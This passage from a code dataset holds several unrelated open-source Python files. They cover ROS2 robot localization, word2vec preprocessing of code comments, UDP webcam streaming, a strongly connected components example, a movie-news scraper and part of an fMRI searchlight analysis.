= strip_output(nb)\n print(\"Writing to\", nbname)\n with io.open(nbname, 'w', encoding='utf8') as f:\n current.write(nb, f, 'json')\n\nif __name__ == \"__main__\":\n for nbname in sys.argv[1:]:\n convert_nb(nbname)\n","repo_name":"yjgao-gfz/pyadjoint","sub_path":"pyadjoint/doc/convert.py","file_name":"convert.py","file_ext":"py","file_size_in_byte":2312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"74371436008","text":"import math\nimport os\nimport pathlib\n\nfrom ament_index_python.packages import get_package_share_directory\n\nfrom cv_bridge import CvBridge\n\nimport rclpy\nfrom rclpy.node import Node\nfrom rclpy.qos import QoSProfile, QoSReliabilityPolicy, QoSHistoryPolicy,QoSDurabilityPolicy\nimport numpy as np\n\nfrom nav_msgs.msg import OccupancyGrid\nfrom nav_msgs.msg import Odometry\nfrom geometry_msgs.msg import Pose, PoseWithCovarianceStamped\nfrom vqa_msgs.msg import VisualFeatures\n\n\nfrom scipy import ndimage, signal\n\nfrom tf2_ros import TransformBroadcaster, TransformException\nfrom tf2_ros.buffer import Buffer\nfrom tf2_ros.transform_listener import TransformListener\nfrom tf2_ros.static_transform_broadcaster import StaticTransformBroadcaster\n\nfrom message_filters import ApproximateTimeSynchronizer, Subscriber, Cache\nfrom topological_mapping.topological_mapping.topological_map import TopologicalMap\nfrom geometry_msgs.msg import TransformStamped\n\n\nclass TopologicalLocalization(Node):\n def __init__(self):\n super().__init__('topological_localization')\n\n map_qos_profile = QoSProfile(\n reliability=QoSReliabilityPolicy.RELIABLE,\n history=QoSHistoryPolicy.KEEP_LAST,\n durability=QoSDurabilityPolicy.TRANSIENT_LOCAL,\n depth=1\n )\n\n # parameters\n self.declare_parameter('map_resolution', 0.050)\n self.declare_parameter('kernel_scale', 8.0)\n self.declare_parameter('question_qty', 10)\n self.declare_parameter('state_qty', 8)\n self.declare_parameter('max_images_per_state', 10)\n \n # it is the number the map(gridmap) shape will be divided by:\n self.kernel_scale = self.get_parameter('kernel_scale').get_parameter_value().double_value\n self.state_qty = self.get_parameter('state_qty').get_parameter_value().integer_value\n self.question_qty = self.get_parameter('question_qty').get_parameter_value().integer_value\n self.question_depth = self.get_parameter(\n 'max_images_per_state').get_parameter_value().integer_value\n # m/pix\n self.map_resolution = self.get_parameter(\n 'map_resolution').get_parameter_value().double_value\n\n self.__pkg_folder = str(pathlib.Path(__file__).parent.resolve()).removesuffix(\n '/topological_localization')\n self.map_folder = os.path.join(get_package_share_directory('topological_mapping'),\n 'map4.npy')\n self.image_map_folder = os.path.join(get_package_share_directory('topological_mapping'),\n 'map3.jpg')\n\n self.vqa_features = None\n self.image_converter = CvBridge()\n self.tf_static_broadcaster = StaticTransformBroadcaster(self)\n self.tf_broadcaster = TransformBroadcaster(self)\n self.tf_buffer = Buffer()\n self.tf_listener = TransformListener(self.tf_buffer, self)\n self.map_helper = None\n self.odom_pose = None\n self.visualizer = None\n # init prediction variables\n self.odom_pose = Odometry().pose\n self.odom_pose.pose.position.x = 0.0\n self.odom_pose.pose.position.y = 0.0\n self.d_increment = self.angle_increment = 0.0\n self.odom_list = []\n # 1.76 s convolution + 4 s perception \n self.timer = self.create_timer(8.0, self.control_cycle)\n # publishers \n self.pose_publisher = self.create_publisher(PoseWithCovarianceStamped, '/markov_pose', 1)\n self.grid_publisher = self.create_publisher(OccupancyGrid,\n '/motion_update/localization_grid',\n 1)\n # subscribers\n self.create_subscription(OccupancyGrid,\n '/map',\n self.map_callback,\n qos_profile=map_qos_profile) \n \n self.tss = ApproximateTimeSynchronizer([Subscriber(self, Odometry, 'odom'),\n Subscriber(self, VisualFeatures, 'features')],\n 10,\n 6)\n 
self.tss.registerCallback(self.feature_callback)\n\n self.broadcast_map()\n\n def control_cycle(self):\n\n\n self.odom_list.append(self.odom_pose)\n if len(self.odom_list) > 2:\n self.odom_list.pop(0)\n\n if len(self.odom_list) < 2 or self.vqa_features is None:\n return\n self.get_logger().debug('executing algorithm')\n\n self.d_increment, self.angle_increment = self._calculate_increment(self.odom_list)\n self.localization_algorithm()\n # image = self.grid_to_img()\n # msg = self.img_to_occupancy(image)\n\n # self.grid_publisher.publish(msg)\n\n def map_callback(self, msg):\n\n self.map_helper = TopologicalMap(msg,\n self.state_qty,\n self.question_qty,\n self.question_depth)\n\n self.get_logger().info('loading topological map .. ')\n self.get_logger().info('map folder path ' + self.map_folder)\n self.map_helper.load_map(self.map_folder)\n self.init_localization_grid()\n\n\n def grid_to_img(self):\n\n return (self._localization_grid[:, :, 0] * 255).round().astype(np.uint8)\n\n\n def broadcast_map(self):\n\n t = TransformStamped()\n\n t.header.stamp = self.get_clock().now().to_msg()\n t.header.frame_id = 'world'\n t.child_frame_id = 'map'\n\n t.transform.translation.x = 0.0\n t.transform.translation.y = 0.0\n t.transform.translation.z = 0.0\n\n t.transform.rotation.x = 0.0\n t.transform.rotation.y = 0.0\n t.transform.rotation.z = 0.0\n t.transform.rotation.w = 1.0\n\n self.tf_static_broadcaster.sendTransform(t)\n\n def img_to_occupancy(self, image):\n\n if self.map_helper is None:\n return\n\n image = image * 100\n\n map = self.map_helper.occupancy_map\n data = np.array(image.flatten(), dtype=np.int8)\n\n map.data = data.tolist()\n\n return map\n\n\n def feature_callback(self, odom_msg, vqa_msg):\n\n if self.map_helper is None:\n return\n \n self.vqa_features = vqa_msg\n self.odom_pose = odom_msg.pose\n\n return True\n\n def init_localization_grid(self):\n\n self._localization_grid = np.full(\n shape=(self.map_helper.occupancy_map.info.height,\n self.map_helper.occupancy_map.info.width,\n self.state_qty+1),\n fill_value=1/((self.state_qty+1)*self.map_helper.occupancy_map.info.height*\n self.map_helper.occupancy_map.info.width))\n\n # 116,192 center coordinates\n # self._localization_grid[105:125,180:200,0] = 0.45\n self.get_logger().info(\"grid initialized\")\n\n return True\n\n def convolve_1d(self, kernel_1d):\n \n _ = np.apply_along_axis(lambda m: np.convolve(m, kernel_1d, mode=\"same\"), axis=-1, arr=self._localization_grid[:,:,1:])\n self._localization_grid[:,:,1:] = _\n\n return True\n \n def _calculate_1d_kernel_size(self):\n\n size = int(np.round(self.state_qty / self.kernel_scale))\n \n return size\n\n def _calculate_1d_kernel_center(self,odom_pose,kernel_shape,is_centered=False):\n\n kernel_resolution = 2*np.pi / kernel_shape #rad/div\n angle = self.map_helper._quaternion_to_euler(odom_pose.pose.orientation)[-1]\n if angle < 0:\n angle = angle + 2*np.pi\n elif angle > 2 * np.pi:\n angle = 2 * np.pi\n if is_centered:\n center = int(np.round(kernel_shape/2))\n else: \n center = int(np.round(angle/kernel_resolution))\n\n return center\n \n def _calculate_2d_kernel_size(self):\n\n height = int(self.map_helper.occupancy_map.info.height / self.kernel_scale)\n width = int(self.map_helper.occupancy_map.info.width / self.kernel_scale) \n \n return (height, width)\n\n def _calculate_2d_kernel_center(self, odom_pose, kernel_shape, is_centered=False):\n\n kernel_resolution = ((self.map_helper.occupancy_map.info.height * self.map_resolution / kernel_shape[0]) +\n 
(self.map_helper.occupancy_map.info.width * self.map_resolution / kernel_shape[1]))/2\n \n\n if is_centered: \n h = int(kernel_shape[0]/2)\n w = int(kernel_shape[1]/2)\n else: \n h = int(round((odom_pose.pose.position.y - self.map_helper.occupancy_map.info.origin.position.y ) / kernel_resolution))\n w = int(round((odom_pose.pose.position.x - self.map_helper.occupancy_map.info.origin.position.x ) / kernel_resolution))\n \n return (h, w)\n\n def _calculate_sigma(self):\n return\n\n def _1d_gaussian_kernel(self, k_size=5, sigma=1.0, center=2):\n\n x = np.arange(k_size)\n \n kernel = (1 / (np.sqrt(2 * np.pi) * sigma)) * np.exp(-((x - center) ** 2 / (2 * sigma ** 2)))\n \n kernel = kernel / np.sum(kernel) \n\n return kernel\n \n def _2d_gaussian_kernel(self, k_size=(10, 10), sig=[1, 1], center=(2, 2)):\n # Define the kernel size\n n_h, n_w = k_size\n\n # Define the standard deviation of the Gaussian distribution for each axis\n sigma_h, sigma_w = sig\n\n # Define the center of the kernel\n center_h, center_w = center\n\n # Create 2D coordinate arrays for the kernel using np.mgrid\n y, x = np.mgrid[:n_h, :n_w]\n\n # Calculate the values of the Gaussian distribution at each element of the kernel\n kernel = (1 / (np.sqrt(2 * np.pi) * sigma_h * sigma_w)) * np.exp(-(((x - center_w) ** 2 / (2 * sigma_w ** 2)) + ((y - center_h) ** 2 / (2 * sigma_h ** 2))))\n\n # Normalize the kernel so that the values sum to 1\n kernel = kernel / np.sum(kernel)\n\n return kernel\n\n def motion_update(self, delta_distance, delta_theta):\n\n self.get_logger().debug(f'delta distance{delta_distance}') \n if delta_distance <= 0.1:\n centered_2d = True\n else:\n centered_2d = False\n if delta_theta <= 0.0872665:\n centered_1d = True\n else:\n centered_1d = False\n\n kernel_shape_2d = self._calculate_2d_kernel_size()\n kernel_shape_1d = self._calculate_1d_kernel_size()\n\n center_2d = self._calculate_2d_kernel_center(self.odom_pose, kernel_shape_2d, is_centered=centered_2d)\n center_1d = self._calculate_1d_kernel_center(self.odom_pose, kernel_shape_1d, is_centered=centered_1d)\n\n gauss_kernel_2d = self._2d_gaussian_kernel(kernel_shape_2d, center=center_2d)\n gauss_kernel_1d = self._1d_gaussian_kernel(kernel_shape_1d, center=center_1d)\n\n self._localization_grid[:, :, 0] = signal.fftconvolve(self._localization_grid[:, :, 0], gauss_kernel_2d, mode='same')\n self.convolve_1d(gauss_kernel_1d)\n self.get_logger().debug(f\"center 2d {center_2d}\")\n\n return True\n\n def normalize_grid(self):\n\n self._localization_grid = self._localization_grid / self._localization_grid.max()\n \n def perception_update(self):\n\n # question_answers_indexes = []\n # question_answers_accs = []\n\n # for i in range(len(self.vqa_features.data)):\n\n # # 'refrigerator' \n # ind = np.where(self.map_helper.topological_map['q_a'] == self.vqa_features.data[i])\n # # we keep only coincidences in the current question \n # ind = ind[0][np.where(ind[1] == i)]\n \n # # we keep the topological indexes where there is a coincidence :\n # current_question_indexes = self.map_helper.topological_map['index'][np.unique(ind)] \n # current_question_acc = []\n \n # # we extract the accuracy for each one of them (acc of question times acc of map) \n # for index in np.unique(ind):\n # acc_ind = np.where(self.map_helper.topological_map['q_a'][index][i] == self.vqa_features.data[i]) \n # acc = acc_ind[0].size / np.nonzero(self.map_helper.topological_map['q_a'][index][i])[0].size \n # current_question_acc.append(acc)\n\n # 
question_answers_indexes.extend(current_question_indexes.tolist())\n # question_answers_accs.extend(current_question_acc)\n\n \n # current_map_raw = np.transpose(np.array([question_answers_indexes,question_answers_accs]))\n \n # # there are repeated indexes\n # unique_elements, counts = np.unique(current_map_raw[:, 0], return_counts=True)\n\n\n\n\n # # Iterate over the unique elements\n # for i in unique_elements:\n\n # indices = np.where(current_map_raw[:, 0] == i)\n # values = current_map_raw[indices][:, 1]\n # product = np.prod(values)\n \n # col,row,state = self.map_helper.topological_index_to_occupancy_x_y(int(i))\n # self._localization_grid[row,col,0] *= (1/product)\n # self._localization_grid[row,col,state] *= (1/product) \n\n question_answers_indexes = []\n question_answers_accs = []\n\n for i in range(len(self.vqa_features.data)):\n\n ind = np.where(self.map_helper.topological_map['q_a'] == self.vqa_features.data[i])\n # we keep only coincidences in the current question \n ind = ind[0][np.where(ind[1] == i)]\n \n # we keep the topological indexes where there is a coincidence :\n current_question_indexes = self.map_helper.topological_map['index'][np.unique(ind)] \n current_question_acc = []\n \n # we extract the accuracy for each one of them (acc of question times acc of map) \n for index in np.unique(ind):\n acc_ind = np.where(self.map_helper.topological_map['q_a'][index][i] == self.vqa_features.data[i]) \n acc = acc_ind[0].size / np.nonzero(self.map_helper.topological_map['q_a'][index][i])[0].size \n current_question_acc.append(acc)\n\n question_answers_indexes.extend(current_question_indexes.tolist())\n question_answers_accs.extend(current_question_acc)\n \n current_map_raw = np.transpose(np.array([question_answers_indexes,question_answers_accs]))\n \n # there are repeated indexes\n unique_elements, counts = np.unique(current_map_raw[:, 0], return_counts=True)\n\n # Iterate over the unique elements\n for i in unique_elements:\n\n indices = np.where(current_map_raw[:, 0] == i)\n values = current_map_raw[indices][:, 1]\n product = np.prod(values)\n \n col,row,state = self.map_helper.topological_index_to_occupancy_x_y(int(i))\n # change to sum\n self._localization_grid[row,col,0] += (1/product)\n self._localization_grid[row,col,state] += (1/product) \n\n self.normalize_grid()\n\n return True\n \n\n def publish_pose(self,covariance=1.0):\n \n ind = np.unravel_index(np.argmax(self._localization_grid, axis=None), self._localization_grid.shape)\n x, y = self.map_helper._get_world_x_y(ind[1], ind[0])\n theta = self.map_helper._undiscretize_angle(ind[2])\n \n msg = PoseWithCovarianceStamped()\n msg.header.frame_id = 'map'\n msg.header.stamp = self.get_clock().now().to_msg()\n\n msg.pose.pose.position.x = x\n msg.pose.pose.position.y = y\n msg.pose.pose.position.z = 0.0\n\n q = self.map_helper._quaternion_from_euler(0.0, 0.0, theta)\n msg.pose.pose.orientation.x = q[0]\n msg.pose.pose.orientation.y = q[1]\n msg.pose.pose.orientation.z = q[2]\n msg.pose.pose.orientation.w = q[3]\n\n self.pose_publisher.publish(msg)\n \n return True\n\n def _calculate_increment(self,msg_buffer):\n\n initial_distance = math.sqrt(msg_buffer[0].pose.position.x ** 2 + \n msg_buffer[0].pose.position.y ** 2 +\n msg_buffer[0].pose.position.z ** 2)\n\n current_distance = math.sqrt(msg_buffer[1].pose.position.x ** 2 + \n msg_buffer[1].pose.position.y ** 2 +\n msg_buffer[1].pose.position.z ** 2)\n\n initial_angle = self.map_helper._quaternion_to_euler(msg_buffer[0].pose.orientation)[-1]\n current_angle = 
self.map_helper._quaternion_to_euler(msg_buffer[1].pose.orientation)[-1]\n \n distance_increment = abs(current_distance - initial_distance)\n angle_increment = abs(current_angle - initial_angle)\n\n return distance_increment, angle_increment\n\n def localization_algorithm(self):\n\n self.perception_update()\n self.motion_update(self.d_increment, self.angle_increment)\n\n self.publish_pose()\n\n\ndef main(args=None):\n rclpy.init(args=args)\n\n topo_node = TopologicalLocalization()\n\n rclpy.spin(topo_node)\n\n\n topo_node.destroy_node()\n rclpy.shutdown()\n\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"juandpenan/topology_nav_ros2","sub_path":"topological_localization/topological_localization/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":17520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"41738315662","text":"import gzip\nimport multiprocessing\nimport re\nimport sys\nfrom argparse import ArgumentParser\nfrom math import floor\nfrom os import listdir, makedirs, path\nfrom shutil import copyfile\n\nimport numpy as np\nimport pandas as pd\nimport spacy\nfrom gensim.models import Word2Vec\nfrom spacy_langdetect import LanguageDetector\nfrom yaspin import yaspin\n\nfrom visualize_embeddings import tsne_plot\n\nORTH = spacy.symbols.ORTH\n\n\ndef round_down(num):\n i = str(num)\n divisor_max = 2 if num < 1000 else 3\n divisor_idx = min(len(i), divisor_max)\n\n divisor = \"\".join(i[:divisor_idx])\n\n for i in range(len(divisor), len(i)):\n divisor = divisor + \"0\"\n\n divisor = int(divisor)\n\n return floor(num / divisor) * divisor\n\n\ndef splitForwardSlashes(match):\n slashes = list(match.group(0))\n return \" \".join(slashes)\n\n\ndef clean_token(text):\n # normalize\n text = text.lower()\n\n # replace URLs\n text = re.sub(r\"(https|http)?:\\/\\/(\\w|\\.|\\/|\\?|\\=|\\&|\\%)*\\b\", \"URL\", text)\n\n # custom splitting rule to create space around special code characters\n text = re.sub(r\"([.,()<>\\[\\]{}\\\"\\'`\\-$=_;%|~^\\\\])\", r\" \\1 \", text)\n\n # replace multiple forward slashes\n text = re.sub(r\"\\/{3,}\", lambda m: splitForwardSlashes(m), text)\n\n # replace tab stops\n text = re.sub(r\"\\t\", \"\", text)\n\n # replace newlines with a special \"end-of-sequence\" token\n text = re.sub(r\"\\r\\n|\\r|\\n\", \" \", text)\n\n return text\n\n\ndef clean_document(doc):\n \"\"\" Clean up comments. Tokenize, lowercase, and remove characters that are not allowed \"\"\"\n\n # filter out English comments\n isEnglish = lambda doc: doc._.language[\"language\"] == \"en\"\n\n if not isEnglish(doc):\n return nlp.make_doc(\"\")\n\n # clean each token in document\n text = [token for token in (clean_token(tok.text) for tok in doc) if token != \"\"]\n\n text = \" \".join(text)\n\n # adding a start and an end token to the sentence so that\n # the model know when to start and stop predicting\n text = \" \" + text + \" \"\n\n # replace multiple whitespaces with a single whitespace\n text = re.sub(r\" {2,}\", \" \", text)\n\n return nlp.make_doc(text)\n\n\nnlp = spacy.load(\"en_core_web_sm\")\n\n# add special cases for the tokenizer\nnlp.tokenizer.add_special_case(\"/**\", [{ORTH: \"/**\"}])\nnlp.tokenizer.add_special_case(\"/*\", [{ORTH: \"/*\"}])\nnlp.tokenizer.add_special_case(\"*/\", [{ORTH: \"*/\"}])\nnlp.tokenizer.add_special_case(\"//\", [{ORTH: \"//\"}])\nnlp.tokenizer.add_special_case(\"\", [{ORTH: \"\"}])\nnlp.tokenizer.add_special_case(\"\", [{ORTH: \"\"}])\nnlp.tokenizer.add_special_case(\"\", [{ORTH: \"\"}])\n\nnlp.add_pipe(clean_document, name=\"cleaner\", last=True)\nnlp.add_pipe(LanguageDetector(), name=\"language_detector\", before=\"cleaner\")\n\nboolean = lambda x: (str(x).lower() == \"true\")\n\nparser = ArgumentParser()\n\nparser.add_argument(\n \"-v\", \"--visualize\", nargs=\"?\", type=boolean, const=True, default=False\n)\n\nparser.add_argument(\n \"-s\", \"--save-dataset\", nargs=\"?\", type=boolean, const=True, default=True\n)\n\nparser.add_argument(\"-t\", \"--train\", nargs=\"?\", type=boolean, const=True, default=False)\n\nparser.add_argument(\n \"-d\", \"--dataset\", nargs=\"?\", type=str, const=True, default=\"dataset.json\"\n)\n\nargs = parser.parse_args()\n\nsaveDataset = args.save_dataset\nvisualize = args.visualize\ntrain = args.train\n\ndata_dir = \"../data\"\nmetadata_filename = \"metadata.txt\"\nmetadata_path = path.join(data_dir, 
metadata_filename)\ndataset_path = path.join(data_dir, args.dataset)\nfilename_dataset_clean = \"dataset_clean.csv\"\n\nif not path.exists(dataset_path):\n sys.exit(\n \"Error: Couldn't find '{}'. Make sure to generate a dataset first.\".format(\n path.basename(dataset_path)\n )\n )\n\nout_dir = \"../runs\"\n\n# create output dir\nif not path.exists(out_dir):\n makedirs(out_dir)\n\ndf = pd.read_json(dataset_path, lines=True)\n\n# create run dir\nrun_dir = \"\"\n\n# --- Hyper-Parameters ---\n\n# more dimensions mean more computationally expensive,\n# but also more accurate. 300 is a decent compromise\nnum_features = 300\n\n# minimum count of words to consider when training the model\nmin_word_count = 3\n\n# run training in parallel, more workers = faster training\nnum_workers = multiprocessing.cpu_count()\n\n# size of the sliding window (number of words around the target window)\nwindow_size = 7\n\n# determines how often do we want to look at the same word\ndownsampling = 1e-3\n\n# used to pick what part of the text we look at\nseed = 1\n\n# default is 5, we keep the default because increasing the number\n# of epochs dramatically increases the training time, but also gives\n# better results.\nepochs = 5\n\n# ------------------------\n\n\n@yaspin(text=\"Cleaning comments...\")\ndef clean_comments(comments):\n comments = comments.apply(lambda c: nlp(c))\n comments = comments.apply(lambda doc: doc if doc.text != \"\" else np.nan)\n return comments\n\n\n@yaspin(text=\"Dumping dataset...\")\ndef dump_dataset(df):\n df.to_csv(path.join(run_dir, filename_dataset_clean), header=True)\n\n\n@yaspin(text=\"Training Word2vec...\")\ndef train_word2vec(\n sentences,\n sg=1,\n size=num_features,\n min_count=min_word_count,\n seed=seed,\n window=window_size,\n sample=downsampling,\n iter=epochs,\n):\n model = Word2Vec(\n sentences,\n sg=sg,\n size=size,\n min_count=min_count,\n seed=seed,\n window=window,\n workers=num_workers,\n sample=sample,\n iter=iter,\n )\n\n return model\n\n\n@yaspin(text=\"Saving model...\")\ndef save_model(model, filename):\n model_path = path.join(run_dir, filename)\n model.save(model_path)\n\n\n@yaspin(text=\"Plotting word embeddings...\")\ndef plot_embeddings(model, df, filename):\n tsne_plot(model, df, filename)\n\ndf[\"comments_orig\"] = df[\"comments\"]\ndf[\"comments\"] = clean_comments(df[\"comments\"])\n\n# remove corrupted rows (mostly comments that are written in languages other than English)\ndf = df.dropna()\n\nn_observations = df.shape[0]\nn_observations_r = round_down(n_observations)\n\nrun_dir = path.join(out_dir, str(n_observations_r))\n\nif not path.exists(run_dir):\n makedirs(run_dir)\n\nprint(\"Observations: {}\".format(n_observations))\n\ncomments = df[\"comments\"].map(lambda doc: [token.text for token in doc])\n\nif train:\n model_comments = train_word2vec(comments)\n save_model(model_comments, \"word2vec_comments.model\")\n print(\"Size Vocabulary (Comments):\", len(model_comments.wv.vocab))\n\n if visualize:\n plot_embeddings(model_comments, df, path.join(run_dir, \"word2vec_comments.png\"))\n\nasts = df[\"ast\"]\nasts = asts.map(lambda ast: [token for token in ast.split(\" \")])\n\nif train:\n model_asts = train_word2vec(asts, min_count=1)\n save_model(model_asts, \"word2vec_asts.model\")\n print(\"Size Vocabulary (ASTs):\", len(model_asts.wv.vocab))\n\n if visualize:\n plot_embeddings(model_asts, df, path.join(run_dir, \"word2vec_asts.png\"))\n\ndataset_clean = df[[\"ast\", \"comments\", \"comments_orig\"]]\n\nif saveDataset:\n 
dump_dataset(dataset_clean)\n\nprint(\"Copying metadata\")\ncopyfile(metadata_path, path.join(run_dir, metadata_filename))\n\nprint(\"Done!\")\n","repo_name":"urish/ml-comments-gen","sub_path":"model/prepare.py","file_name":"prepare.py","file_ext":"py","file_size_in_byte":7090,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"53"}
+{"seq_id":"71504760489","text":"import time\n\nimport cv2,socket,pickle,os\nimport numpy as np\nimport threading\n\nclass VideoStream:\n def __init__(self):\n self.cap = None\n self.s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n self.s.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, 1000000)\n self.user_sockets = []\n self.current_thread = None\n self.is_streaming = False\n\n def add_user(self, u_ip: str, u_port: int):\n self.user_sockets.append((u_ip, u_port))\n\n def remove_user(self, u_ip: str, u_port: int):\n t = (u_ip, u_port)\n self.user_sockets.remove(t)\n self.stop_streaming()\n\n def video_streaming(self):\n print(\"Streaming!\")\n self.is_streaming = True\n # self.cap = cv2.VideoCapture(0, cv2.CAP_DSHOW)\n self.cap = cv2.VideoCapture(0)\n while self.is_streaming:\n ret, photo = self.cap.read()\n\n if photo is None:\n continue\n ret, buffer = cv2.imencode(\".jpg\", photo, [int(cv2.IMWRITE_JPEG_QUALITY), 30])\n x_as_bytes = pickle.dumps(buffer)\n for u_ip, u_port in self.user_sockets:\n self.s.sendto((x_as_bytes), (u_ip, u_port))\n\n def start_stream(self, u_ip: str, u_port: int):\n if not self.user_sockets:\n self.current_thread = threading.Thread(target=self.video_streaming)\n self.current_thread.start()\n\n self.add_user(u_ip, u_port)\n\n def stop_streaming(self, force=False):\n time.sleep(0.1)\n if force or not self.user_sockets:\n self.is_streaming = False\n self.cap.release()\n print(\"stopped streaming from class\")\n\n\n\n\n","repo_name":"DoronMaor/MyGardenGenie","sub_path":"trash/VideoStreaming/VideoStream.py","file_name":"VideoStream.py","file_ext":"py","file_size_in_byte":1670,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"}
+{"seq_id":"27685599634","text":"###################################\r\n#\t\t\t\t\t\t\t\t #\r\n#\t\tAuthor : Dhananjay\t\t #\r\n#\t\t\t\t IIT Gandhinagar #\r\n#\t\t\t\t\t\t\t\t #\r\n###################################\r\n\r\n# Finding strongly connected components(SSC) in directed graph\r\n# Extension of dfs \t\t\t\t\t - \t\tO(V+E)\r\n\r\nfrom collections import defaultdict\r\nUNVISITED = 0\r\nEXPLORED = 1\r\nVISITED = 2\r\n\r\ndef SSC(u):\r\n\tglobal dfsNumber, sscNumber\r\n\tdfs_low[u] = dfs_num[u] = dfsNumber\r\n\tdfsNumber += 1\r\n\tvisited[u] = VISITED\r\n\tstc.append(u)\r\n\t\r\n\tfor v,w in AdjList[u]:\r\n\t\tif dfs_num[v] == UNVISITED:\r\n\t\t\tSSC(v)\r\n\t\tif visited[v]:\r\n\t\t\tdfs_low[u] = min(dfs_low[u], dfs_low[v])\r\n\t\r\n\tif dfs_low[u] == dfs_num[u]:\r\n\t\tsscNumber += 1 \r\n\t\tprint(\"SSC\", sscNumber,\":\", end = \" \")\r\n\t\twhile True:\r\n\t\t\tv = stc.pop()\r\n\t\t\tvisited[v] = UNVISITED\r\n\t\t\tprint(v, end = \" \")\r\n\t\t\tif u == v:\r\n\t\t\t\tbreak\r\n\t\tprint()\r\n\r\n\r\nAdjList = defaultdict(list)\r\n# Graph for which we will create AdjList.\r\n#\r\n# 7 5 9 1\r\n#\t0 ------> 1 ---> 2 ------> 4 ---> 5\r\n#\t\t ^ /\t\t ^ |\r\n#\t\t 8| / 5\t 5|\t | 3\r\n#\t\t | /\t\t |\t |\r\n# |v \t | 3 v \r\n# 3 \t 6 <--- 7\r\nAdjList = {0 : [[1,7]],\r\n\t\t 1 : [[2,5]],\r\n\t\t 2 : [[3,5],[4,9]],\r\n\t\t 3 : [[1,8]],\r\n\t\t 4 : [[5,1]],\r\n\t\t 5 : [[7,3]],\r\n\t\t 6 : [[4,5]],\r\n\t\t 7 : [[6,3]]}\r\nV = len(AdjList)\r\ndfs_num = [UNVISITED]*V\r\ndfs_low = [UNVISITED]*V\r\nvisited = [UNVISITED]*V\r\nstc = []\r\ndfsNumber = 0\r\nsscNumber = 0\r\n\r\nfor i in range(V):\r\n\tif dfs_num[i] == UNVISITED:\r\n\t\tSSC(i)\r\n","repo_name":"dhananjay1210/Data-Structures","sub_path":"graph/8.graph_SSC.py","file_name":"8.graph_SSC.py","file_ext":"py","file_size_in_byte":1516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"30257054138","text":"import requests\nfrom bs4 import BeautifulSoup\n\nheaders = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}\n\ndef get_pages(idx):\n url = \"https://editorial.rottentomatoes.com/publications\"\n response = requests.get(url, params = {'wpv_view_count': '52769-TCPID52767', 'wpv_paged': idx}, headers = headers)\n html = response.text\n soup = BeautifulSoup(html, \"html.parser\")\n\n headlines = soup.select('a.article_headline')\n publishers = soup.select('a.unstyled.bold')\n date = soup.select('.subtle.small')\n\n output_hl = []\n output_pub = []\n output_date = []\n\n # for title in headlines:\n # output.append(title.text.strip())\n\n # print(len(headlines))\n # print(len(publishers))\n # print(len(date))\n\n for i in range(0, len(headlines)):\n output_hl.append(headlines[i].text.strip())\n output_pub.append(publishers[i].text.strip())\n output_date.append(date[i].text.strip())\n\n return output_hl, output_pub, output_date\n\nfor j in range(1,100):\n result_hl, result_pub, result_date = get_pages(j)\n for i in range(0,len(result_hl)):\n print(result_hl[i])\n print(result_pub[i])\n print(result_date[i])\n","repo_name":"pondjames007/DetourningTheWeb","sub_path":"hw2_grabLongList/hw2.py","file_name":"hw2.py","file_ext":"py","file_size_in_byte":1273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"25292683241","text":"import os\nimport pickle\nimport numpy as np\nimport pandas as pd\nimport nibabel as nib\n\nfrom fg_config import *\nfrom bids_model import bids_events\n\nfrom nilearn.input_data import NiftiMasker\nfrom nilearn.image import new_img_like\nfrom collections import OrderedDict\nfrom scipy.stats import ttest_1samp, ttest_ind, wilcoxon\n\nconditions = {'CS+': 'CSp',\n 'CS-': 'CSm'}\nphases = ['acquisition','extinction']\n\nmasker = NiftiMasker(mask_img=std_2009_brain_mask_3mm)\nmasker.fit()\n\n\ndef sub_imgs():\n\n std = nib.load(std_2009_brain_mask_3mm)\n for sub in all_sub_args:\n print(sub)\n subj = bids_meta(sub)\n out = f'{subj.rsa}/ers_sl_imgs'\n mkdir(out)\n\n with open(os.path.join(subj.rsa,'sl_er.p'),'rb') as file:\n mat = pickle.load(file)\n mat = new_img_like(std_2009_brain_3mm,mat)#need this for the inverse to work\n mat = masker.transform(mat)\n\n df = pd.read_csv(os.path.join(subj.rsa,'fs_mask_roi_ER.csv'))\n df = df[df.roi == 'sgACC'].reset_index(\n ).rename(columns={'index':'trial_num'}\n ).drop(columns=['roi','rsa']\n ).set_index(['encode_phase','trial_type']\n ).sort_index(\n ).dropna(subset=['response'])#sets us up to use .loc for stability\n\n for phase in phases:\n for con in conditions:\n est = mat[df.loc[(phase,con),'trial_num'].values,:].mean(axis=0)\n est = new_img_like(std,masker.inverse_transform(est).get_fdata(),copy_header=True)#need this for the header\n nib.save(est,f'{out}/{phase}_{conditions[con]}.nii.gz')\n\n #lets also do the subtraction i guess\n for phase in phases:\n csp = mat[df.loc[(phase,'CS+'),'trial_num'].values,:].mean(axis=0)\n csm = mat[df.loc[(phase,'CS-'),'trial_num'].values,:].mean(axis=0)\n est = csp - csm\n est = new_img_like(std,masker.inverse_transform(est).get_fdata(),copy_header=True)#need this for the header\n nib.save(est,f'{out}/{phase}_diff.nii.gz')\n\ndef one_samp_ttest(subs=None,phase=None,name=''):\n out_parent = '/scratch/05426/ach3377/searchlight/ers_comps'\n out_dir = f'/scratch/05426/ach3377/searchlight/ers_comps/{name}_{phase}'\n mkdir(out_dir)\n \n setA = ''\n for s, sub in enumerate(subs):\n setA += f'{bids_meta(sub).rsa}/ers_sl_imgs/{phase}_diff.nii.gz '\n \n n_cors = 'export OMP_NUM_THREADS=48'\n cd_cmd = f'cd {out_dir}'\n clustsim_cmd = f'3dttest++ -setA {setA} \\\n -Clustsim 48 \\\n -mask {gm_3mm_thr} \\\n -prefix 